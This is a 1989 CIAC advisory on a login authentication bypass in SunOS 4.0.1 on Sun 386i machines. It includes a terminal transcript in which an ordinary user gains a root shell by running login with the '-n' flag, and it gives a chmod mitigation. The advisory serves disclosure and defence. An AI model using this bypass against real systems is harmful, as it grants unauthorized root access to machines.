|
________________________________________________________________ THE COMPUTER INCIDENT ADVISORY CAPABILITY CIAC ADVISORY NOTICE ________________________________________________________________ COMPUTER SECURITY INFORMATION Authentication bypass in Sun 386i machines The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun OS (SOS), accepts the argument "-n" which bypasses authentication. It was apparently added in order to allow the Sun program "logintool" to do the authentication and have login do the housekeeping. This allows a user who discovers the new argument to the login program to become a root user in several ways. An example of one method is attached. A temporary solution is to disable logintool and patch the binary using the "strings" and "adb"method used last November. Alternatively and more simly, log in a root and issue the command chmod 110 /bin/login Example of login endrun: --------------------------------------------------- Script started on Tue Apr 11 14:16:25 1989 myhost[1] whoami oconnor myhost[2] /bin/login -n root Login incorrect login: onceuponatime No home directory specified in password file! Logging in with home=/ # whoami root # who a i myhost!onceupon ttyp2 Apr 11 14:17 # ^D myhost1[3] ^D script done on Tue Apr 11 14:17:34 1989 --------------------------------------------------- Sun is presently working on a patch. When it is available, CIAC will inform you accordingly. For questions or additional information, please contact Gene Schultz CIAC Team Leader (415) 422-8193 or FTS 532-8193 gschultz%nsspa@icdc.llnl.gov